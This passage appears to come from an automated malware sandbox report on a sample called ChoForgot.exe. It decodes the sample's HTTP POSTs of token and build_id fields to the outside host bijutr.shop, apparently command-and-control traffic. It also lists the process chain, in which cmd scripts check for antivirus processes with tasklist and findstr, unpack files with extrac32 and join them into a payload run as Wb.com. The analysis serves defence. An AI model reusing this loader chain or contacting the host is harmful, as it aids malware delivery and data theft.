                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4d 37 39 52 51 39 5a 35 38 59 4d 37 59 55 4b 58 34 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 37 39 52 51 39 5a 35 38 59 4d 37 59 55 4b 58 34 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 37 39 52 51 39 5a 35 38 59 4d 37 59 55 4b 58 34 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------JM79RQ9Z58YM7YUKX4ECContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------JM79RQ9Z58YM7YUKX4ECContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JM79RQ9Z58YM7YUKX4ECCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:26 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      51192.168.2.650039188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:28 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FKXTJEK689RIM7GLFKNY
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 4b 58 54 4a 45 4b 36 38 39 52 49 4d 37 47 4c 46 4b 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 54 4a 45 4b 36 38 39 52 49 4d 37 47 4c 46 4b 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 54 4a 45 4b 36 38 39 52 49 4d 37 47 4c 46 4b 4e 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------FKXTJEK689RIM7GLFKNYContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------FKXTJEK689RIM7GLFKNYContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------FKXTJEK689RIM7GLFKNYCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:29 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                      52192.168.2.65004620.198.119.84443
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:31 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 43 47 49 58 77 4e 62 59 7a 30 79 71 4c 42 35 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 35 66 64 33 35 64 66 64 32 32 39 34 32 36 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: CGIXwNbYz0yqLB5Z.1Context: de5fd35dfd229426
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:31 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:31 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 43 47 49 58 77 4e 62 59 7a 30 79 71 4c 42 35 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 35 66 64 33 35 64 66 64 32 32 39 34 32 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 63 71 47 62 59 74 57 34 6f 4b 62 78 7a 47 53 71 76 4c 44 76 42 50 4f 2f 73 6f 6d 33 4f 64 4f 43 45 41 6d 39 2f 67 5a 4c 30 47 64 34 78 53 51 52 33 42 4b 31 6b 4a 68 32 39 37 77 4b 34 2b 4a 52 2f 56 6e 58 64 70 6f 54 62 7a 64 35 77 74 55 67 44 45 34 50 65 4a 74 42 34 6c 4c 43 33 58 4a 57 70 6b 63 4b 42 61 35 59 65 6a 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: CGIXwNbYz0yqLB5Z.2Context: de5fd35dfd229426<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:31 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 43 47 49 58 77 4e 62 59 7a 30 79 71 4c 42 35 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 35 66 64 33 35 64 66 64 32 32 39 34 32 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: CGIXwNbYz0yqLB5Z.3Context: de5fd35dfd229426<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:32 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:32 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 43 31 2f 31 57 57 48 2b 6b 79 4f 46 2f 64 71 42 6f 57 79 44 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: 8C1/1WWH+kyOF/dqBoWyDQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                      53192.168.2.65012020.198.119.84443
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:16:02 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 55 2b 6f 46 4d 33 59 30 7a 45 4b 68 4e 76 30 50 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 36 63 65 66 66 65 61 65 31 39 35 64 38 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: U+oFM3Y0zEKhNv0P.1Context: e96ceffeae195d8d
                                                                                                                                                                                                                                                                                                      2024-12-23 16:16:02 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:16:02 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 55 2b 6f 46 4d 33 59 30 7a 45 4b 68 4e 76 30 50 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 36 63 65 66 66 65 61 65 31 39 35 64 38 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 63 71 47 62 59 74 57 34 6f 4b 62 78 7a 47 53 71 76 4c 44 76 42 50 4f 2f 73 6f 6d 33 4f 64 4f 43 45 41 6d 39 2f 67 5a 4c 30 47 64 34 78 53 51 52 33 42 4b 31 6b 4a 68 32 39 37 77 4b 34 2b 4a 52 2f 56 6e 58 64 70 6f 54 62 7a 64 35 77 74 55 67 44 45 34 50 65 4a 74 42 34 6c 4c 43 33 58 4a 57 70 6b 63 4b 42 61 35 59 65 6a 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: U+oFM3Y0zEKhNv0P.2Context: e96ceffeae195d8d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:16:02 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 55 2b 6f 46 4d 33 59 30 7a 45 4b 68 4e 76 30 50 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 36 63 65 66 66 65 61 65 31 39 35 64 38 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: U+oFM3Y0zEKhNv0P.3Context: e96ceffeae195d8d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:16:02 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                      2024-12-23 16:16:02 UTC58INData Raw: 4d 53 2d 43 56 3a 20 77 4e 57 31 63 51 68 6e 4f 55 69 65 2f 79 38 37 45 38 55 63 57 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: wNW1cQhnOUie/y87E8UcWg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                                      Start time:11:13:57
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\ChoForgot.exe"
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      File size:1'111'393 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:06342512B7BCDFDDA8D6EA8E2D5A24E4
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                                      Start time:11:13:57
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd
                                                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                                      Start time:11:13:57
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                                      Start time:11:13:59
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                                                                                                                                                      Imagebase:0x590000
                                                                                                                                                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                                      Start time:11:13:59
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                      Imagebase:0x6a0000
                                                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                                                      Start time:11:14:00
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                                                                                                                                                      Imagebase:0x590000
                                                                                                                                                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                                      Start time:11:14:00
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                      Imagebase:0x6a0000
                                                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                                      Start time:11:14:00
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:cmd /c md 623615
                                                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                                      Start time:11:14:00
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:extrac32 /Y /E Distances
                                                                                                                                                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                                                                                                                                                      File size:29'184 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                                                      Start time:11:14:01
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:findstr /V "Duck" Ix
                                                                                                                                                                                                                                                                                                      Imagebase:0x6a0000
                                                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                                                                      Start time:11:14:01
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f
                                                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                                                                      Start time:11:14:01
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:Wb.com f
                                                                                                                                                                                                                                                                                                      Imagebase:0xfb0000
                                                                                                                                                                                                                                                                                                      File size:947'288 bytes
